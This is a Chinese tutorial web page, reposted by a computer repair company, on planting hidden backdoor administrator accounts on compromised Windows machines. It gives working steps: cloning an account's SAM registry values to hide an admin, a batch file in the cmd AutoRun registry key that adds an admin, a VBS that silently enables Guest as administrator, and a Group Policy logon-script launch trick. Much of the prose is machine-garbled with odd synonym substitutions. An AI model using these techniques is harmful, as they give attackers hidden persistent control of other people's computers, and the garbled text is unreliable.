设为主页 | 加入收藏 | 繁體中文
当前位置:首页 > 新闻中心 > 行业资讯 > 电脑入门 > 菜鸟教程

windows系统后门账号小结

  1.是用superdoor这个工具(要VB运行库) 
  用法:door user password  例 :door xysky$ 123456
  在CMD中和计算机办理看不到,要注册表中可以看
  妙手用winlogo查PID 一看就知了,还要,进注册表也可
  附,如果在运行CMD的时候进注册表这里,会报错,哈!
  PS:偶不停少用这个工具,晕,被杀撒!
  2.在注册表中克隆一个创建隐藏账号
  如果你喜好工具,用榕哥的CA就可以了,我这是在注册表在操纵,一样的原理撒!
  首先3389上肉鸡
  进入注册表regedt32(注册这里的是regedt32,与regedit不同撒)
  增长以后用户访问HKEY_LOCAL_MACHINE\SAM\ADM的权限
  进了这里,选中SAM,点安全-->权限,在对话框中增长以后用户并勾选上“完全控制”
  新建一个用户 net user xysky$ 123456 /add
  再翻开注册表regedit
  访问HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
  和HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
  将xysky$克隆成办理员
  便是复制办理员的数据到你的撒
  导出xysky$所对应的两个值
  将xysky$删失 net user xysky$ /del
  导入刚才导出的两个值,创建完成
  PS:用户建好之后,在下令行里和电脑办理中看不到此用户,只有在用这个用户登陆的时候才气看到,不克不及改密码,改了注册表会出错,在下令行下删不失,只有在注册表里可以删除。另外,你可以克隆别的任何人撒,这里只提供思路!
  3.做不去世的幽灵账号
  首先说一下原理:
  HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun
  HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
  这两个地位 如果 /D 未在下令行上被指定,当 CMD.EXE 运行时,它会主动寻找以下 REG_SZ/REG_EXPAND_SZ 注册表变量。如果其中一个或两个都存在,这两个变量会先予执行。
  也便是说,只需启动了CMD就会运行上述的脚本,可以说成是CMD关联吧。
  信赖懂了原理,你想干什么就干什么,我这里是做账号撒!!
  大概你想建个批处置惩罚放到这个注册表下,呵呵。
  批处置惩罚代码如下:
  @echo off
  net user xysky$ 123456789 /add
  net localgroup administrators xysky$ /add
  生存成一个批处置惩罚文件,放到注册表启动中关联CMD!
  你亲身试一下吧,翻开你的CMD,会不会有点不同呢!
  Microsoft Windows 2000 [Version 5.00.2195]
  (C) 版权全部 1985-2000 Microsoft Corp.
  下令乐成完成。
  下令乐成完成。
  D:\WINNT>
  由于你执行了两个下令以是有两个乐成表现撒!
  呵,我想办理员会发现的撒!
  呵,下面这代码就有了它的好处,呵!
  先创建一个VBS文件内容如下:
  dim wsh 
  set wsh=CreateObject("WScript.Shell")
  wsh.run "net user guest /active:yes",0
  wsh.run "net user guest 123456789",0
  wsh.run "net localgroup administrators guest /add",0
  下面一段VBS的意思便是激活GUEST帐号,并且加为初级办理组,设置密码为123456789
  生存好,再进入注册表,找到下面的地位,填上这个VBS的路径,呵呵!
  好了,翻开你的计算机办理,关了GUEST 再开CMD,再翻开你的计算机办理,呵呵!有什么发现呢!
  PS:我想你看了这里,大概想到更多的要领,只需是可以随系统启动运行就可以了,好比在组计谋里加载这个文件启动,呵!下面我们来演示一下吧!
  4.另类的隐藏启动方法
  在黑客在线7上看了一篇文章,有了点思路,于是用到账号下去,呵呵!
  木马你了解吗?一般是在一些设置启动的文件如win.ini或者注册表中启动相干,再初级点的便是注册为服务,随系统启动而启动!不过以上启动方法都可以在msconfig 启动 服务 中找到踪迹!
  下面利用组计谋的用户登陆运行程序,呵呵!
  开端-->运行 在中执行 Gpedit.msc 翻开组计谋  顺次睁开用户设置装备摆设 办理模板  系统 登陆 在左边找到“在用户登陆时运行这些程序” 双击翻开 设为启用 并按表现按钮 出现“表现内容”窗口,在这里添加你的程序(我这里是加载下面的脚本,呵呵!)就得了。
 


    文章作者: 福州军威计算机技术有限公司
    军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
    版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

TAG:
评论加载中...
内容:
评论者: 验证码:
  
上一篇: 用GkrellM监测Linux网络服务器
下一篇: 用批处理对MySQL进行数据操作

友情链接